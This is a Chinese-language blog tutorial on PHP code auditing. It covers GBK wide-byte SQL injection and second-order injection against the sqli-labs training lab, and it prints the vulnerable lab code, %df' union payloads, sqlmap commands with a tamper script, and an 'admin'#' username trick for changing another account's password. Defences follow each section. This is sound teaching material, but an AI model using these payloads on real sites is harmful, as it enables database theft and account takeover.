php代码审计-宽字节注入与二次注入

已于 2024-07-12 17:07:29 修改
阅读量1.3k 收藏 24
点赞数 33
分类专栏: 代码审计 文章标签: android
于 2024-07-12 17:04:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83176532/article/details/140382996
版权

php代码审计-宽字节注入与二次注入

宽字节注入

前景

魔术引号

在一些低版本(php5.4以下)的php中会将魔术引号(magic_quotes_gpc()=on)打开。该函数会将一些特殊符号('、”、反斜杠、null字符(\0))进行转义,而在高版本的php中,因为魔术引号被弃用进而使用mysql_real_escape_string()、addlashes()来对特殊字符进行转义,从而来预防sql注入。

:魔术引号可以在低版本php.ini文件中找到

编码格式

宽字节是相对与ascii这样单字节而言的;像GB2312、GBK、GB18030等这些都是宽字节,占用两个字节。GBK 是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。

注入原理

宽字节注入是指mysql数据库在使用宽字节(如:GBK)编码时,会认为两个字符串是一个汉字(前一个ascii码要大于128(如%df),才能得到汉字的范围),当输入单引号之后,会将其进行转义(在其前面加上反斜杠,之后变为\'),反斜杠经过url编码变为%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,从而变成一个汉字,导致单引号逃逸形成闭合,实现攻击

image-20240712090607307

靶场演示

注入条件

  • 数据库编码必须是gbk
  • 写入到前一个字符串ascii码要大于128

代码分析

sql_labs第36关

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_quotes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#00FF00">';	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}
        
        

?>
  • 使用了mysql_real_escape_string$id进行了特殊字符的转义
  • mysql_query("SET NAMES gbk");设置数据库为gbk编码
  • 以get形式传参
  • 以上成功造成了宽字节注入,可以使用报错注入、联合注入、时间盲注、布尔盲注

漏洞利用

联合查询

?id=1%df' order by 3 --+
?id=-1%df' union select 1,2,3 --+

%df%27会形成一个汉字,进而造成'逃逸出来形成闭合

image-20240712093721337

sqlmap

python sqlmap.py -u "http://127.0.0.1:81/sqli/Less-36/?id=1" --tamper=unmagicquotes --dbs --batch
or
python sqlmap.py -u "http://127.0.0.1:81/sqli/Less-36/?id=1%df' *" --dbs --batch

使用了unmagicquotes.py脚本,用于宽字节绕过

image-20240712094316678

防范措施

防御

  1. 解决SQL注入最推荐的方法还是预处理+数据绑定。

  2. 数据库编码格式不使用宽字节编码

二次注入

原理

由于网站在用户输入数据时通过mysql_escape_string()、addlashes()等对特殊字符进行\转义,但是存入到数据库时又去除了反斜杠,当从数据库中调出时由于没有进行特殊符号的转义造成了单引号闭合,从而形成了注入

靶场演示

代码分析

文件的用途

image-20240712151336176

login_create.php的部分代码

<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");



if (isset($_POST['submit']))
{
	

# Validating the user input........

	//$username=  $_POST['username'] ;
	$username=  @mysql_escape_string($_POST['username']) ;
	$pass= @mysql_escape_string($_POST['password']);
	$re_pass= @mysql_escape_string($_POST['re_password']);
	
	echo "<font size='3' color='#FFFF00'>";
	$sql = "select count(*) from users where username='$username'";
	$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
  	$row = mysql_fetch_row($res);
	
	//print_r($row);
	if (!$row[0]== 0) 
		{
		?>
		<script>alert("The username Already exists, Please choose a different username ")</script>;
		<?php
		header('refresh:1, url=new_user.php');
   		} 
		else 
		{
       		if ($pass==$re_pass)
			{
				# Building up the query........
   				
   				$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
				echo $sql;
   				mysql_query($sql) or die('Error Creating your user account,  : '.mysql_error());
   				......?>
  • 使用mysql_escape_string分别对username,password,re_password进行转义,之后执行查询语句,若数据库没有相同的username并且·password,re_password一致就会进行插入操作。当然转义出来的\不会插入到数据库中

login.php

   $username = mysql_real_escape_string($_POST["login_user"]);
   $password = mysql_real_escape_string($_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
   $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysql_fetch_row($res);
	//print_r($row) ;
   if ($row[1]) {
			return $row[1];
   } else {
      		return 0;
   }
  • 会对输入账号密码进行特殊符号的转义,绕过比较困难

pass_change.php

	$username= $_SESSION["username"];
	$curr_pass= @mysql_real_escape_string($_POST['current_password']);
	$pass= @mysql_real_escape_string($_POST['password']);
	$re_pass= @mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
			echo "Password successfully updated";
	
		}
		else
		{
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}
  • 发现username是通过$_SESSION来获取的并没有进行特殊符号的转义,而其他的current_password、password、re_password是会进行转义的
  • 对比$pass与$re_pass的之后,进行update更改操作

漏洞思路

明显的注入点是在更改密码的操作上,我们可以通过对username的控制来进行报错注入

  • 首先注册一个用户,例如用户名:admin'#这个用户,虽然会对输入的用户进行进行转义,但是/并不会写入到数据库中

image-20240712154521826

  • 使用该用户登录,修改该用户的密码,将该用户的密码修改为222222

image-20240712154612258

但是发现admin' #的密码并没有修改而是修改的admin的密码

image-20240712154820375

原因:这是因为admin' #'对sql语句形成了闭合#注释掉了后面的内容,形成的sql语句如下,进而修改了用户:admin的密码

UPDATE users SET PASSWORD='$pass' where username='admin' # and password='$curr_pass'

漏洞利用:本来是准备使用报错注入的,结果发现这个数据库对用户名的长度是由限制的,我们无法创建一个满足报错注入的那么长的用户名,所以只能进行到这里了

修复措施

  1. 进行预处理来进行参数绑定从而更好的预防二次注入

  2. 另一个防御的点就是在输入输出前的sql语句执行前都对其进行过滤、转义

小小star
关注
专栏目录
宽字节注入
东方
06-06 2751
GBK双字节编码:一个汉字用两个字节表示,首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),刚好涵盖了转义符号\对应的编码0×5C。 0xD50×5C 对应了汉字“诚”,URL编码用百分号加字符的16进制编码表示字符,于是 %d5%5c 经URL解码后为“诚”。 下面分析攻击过程: 访问 http://www.2cto.com /test.php?username=test...
php二次注入
偷一个月亮
07-03 274
php宽字节注入,SQL注入宽字节注入(MySQL)
weixin_32691823的博客
03-09 300
0x00 应用场景在注入时通常会使用单引号、双引号等特殊字符。在应用中,通常为了安全,开发者会开启php的magic_quotes_gpc,或者使用addslashes、mysql_real_escape_string等函数对客户端传入的参数进行过滤,则注入的单引号或双引号就会被"\"转义,但是,如果服务端的数据库使用的是GB2312、GBK、GB18030等字节的编码时,则依然会造成注入。0x...
php sql 二次注入,SQL注入----二次注入、堆叠注入
weixin_31445167的博客
03-18 219
二次注入最近在看到《Web安全攻防 渗透测试实战指南》说了关于二次注入的问题,以前就听过二次注入,但是没有深入了解过。栗子:有两个界面,1.php是用户注册的页面(不一定是注册,主要是一个可以插入sql语句的页面),另外一个2.php通过某些参数(比如ID)去读取用户信息(比如用户名)的页面。在注册用户名的页面,我们注册一个 test' 的用户,这个单引号被成功插入到了数据库(先不管用户名不给单引...
PHP代码审计基础:宽字节注入二次注入漏洞
1匹黑马
11-25 668
文章目录宽字节注入intval()addslashes()宽字节注入绕过修复方案二次注入二阶注入与一阶注入的区别搭建环境进行注入原理修复方案 宽字节注入 在使用PHP连接MySQL的时候,当设置“setcharacter_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入,当存在宽字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉。这里需要先说两个函数,这两个函数的作用就是防注入。 intval() 这里就相当于一个强制转型,即使是特殊符号,也会转
代码审计】 ---- SQL注入漏洞挖掘与防范
qq_43168364的博客
02-17 605
一、挖掘经验 1.1 普通注入 1.2 编码注入 二、漏洞防范 2.1 gpc/runtime 魔术引号 2.2 过滤函数类 2.3 PDO prepare 预编译
PHP代码审计文档.zip
11-02
第7课:PHP代码审计宽字节注入二次注入mp4 第6课:PHP代码审计SQL注入漏洞mp4 第5课:审计涉及的超全局变量mp4 第4课:代码调试及 Xdebug的配置使用mp4 第3课:PHP核心配置详解mp4 第2课:代码审计的思路及流程mp4 ...
代码审计】--- php代码审计方法
qq_43168364的博客
02-11 4746
代码审计需要掌握的点 PHP编程语言的特性和基础 Web前端编程基础 漏洞形成原理 代码审计思路 不同系统、中间件之间的特性差异 代码审计思路 方法一 ---- 检查敏感函数的参数,然后回溯变量,判断变量是否可控,并且有没有经过严格的过滤,这是一个逆向追踪的过程 方法二 ---- 找出哪些文件在接收外部传入的参数,然后跟踪变量的传递过程,观察是否有变量传入到高危函数里面,或者传递的过程是否有逻辑漏洞,这是一种正向追踪的方式 方法三 ---- 直接挖掘功能点漏洞,根据自身经验判断该类应用通常在哪些功能中
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1481
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
二次注入 php,危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析
weixin_33462540的博客
03-13 282
今天分析是PHPYun的一个二次注入漏洞(漏洞详情)。0x00 知识前提PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字。echo is_numeric(233333); # 1echo is_numeric('233333'); # 1echo is_numeric(0x233333); # 1echo is_numeri...
php审计--POST[‘id‘]二次注入-GET[‘id‘]宽字节注入
qq_29437513的博客
08-07 422
POST[‘id’]二次注入在网站业务在注入点出现在注册页reg.php 我们在注册的时候,如果’ union select 1,2,3,4#这样的语句能带入数据库,但没有直接利用办法,那就能通过查询search.php来sql注入 前端这里写一个Form <form action="reg.php" method="POST"> id:<input type="text" name="id"><br> username: <input type=
PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入
m0_62089210的博客
09-07 153
if ($setsqlarr['uid'] == 0 || $setsqlarr['pid'] == 0) showmsg('参数错误!
宽字节注入详解
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、字节已经常见字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
二次sql注入
三生三世的博客
05-14 1765
这种注入方式一般是在如下情况出现时发生:为了预防SQL注入攻击,而将输入到应用程序中的某些数据进行了“转义(escape)”,但是这些数据却又在“未被转义(Unescaped)”的查询窗体中重复使用。 例如,这里我们更改登录处理页面(在前面“攻击系统”一节中介绍的那个页面)以回避单引号: username = escape( Request.form("username") ); pas
SQL注入教程——(四)宽字节注入
热门推荐
hijack89的博客
07-27 2万+
前言在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。涉及到的基本概念 字符、字符集 字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(en
《WEB安全渗透测试》(6)SQL注入实战:二次注入
午夜安全
10-03 4889
《WEB安全渗透测试》(6)SQL注入实战:二次注入 二次注入:攻击者构造的恶意数据存储到数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。1.php的功能是注册用户,也是插入SQL恶意数据的地方。2.php的功能是通过参数ID读取用户名和用户信息。在这里恶意数据被读取并进入SQL查询语句。1)判断数据库表有几个字段(1)访问URL:http://www.tianchi.com/web/erci/1.php?username=test'得到id=4...
宽字节注入入门详解
爱党人士
05-11 4434
原理: GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等), 单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C , 那么现在 %df\’ =%df%5c%27, 如果程序的默认...
sql-labs宽字节注入
最新发布
07-28
宽字节注入是一种针对某些数据库的特殊注入攻击技术,它利用了某些数据库在处理字符编码转换时的漏洞。而 SQL-Labs 是一个用于学习和测试 SQL 注入漏洞的开源项目。 在宽字节注入中,攻击者通过在输入的数据中插入特殊编码的字节字符,绕过了数据库的输入过滤和检查,成功执行恶意的 SQL 语句。这种攻击技术主要针对使用双字节字符集编码(如 GBK、Big5 等)的数据库。 SQL-Labs 提供了一系列预设的 SQL 注入漏洞场景,供学习者测试和练习。通过 SQL-Labs,你可以了解和学习如何利用不同的注入技巧来攻击和利用数据库漏洞,并学习如何防范和修复这些漏洞。 如果你想了解更多关于宽字节注入和 SQL-Labs 的内容,你可以参考相关的安全资料和文档,并按照合法和道德的方式进行学习和测试。同时,务必遵守法律法规和道德规范,不要利用这些知识进行非法和恶意的活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值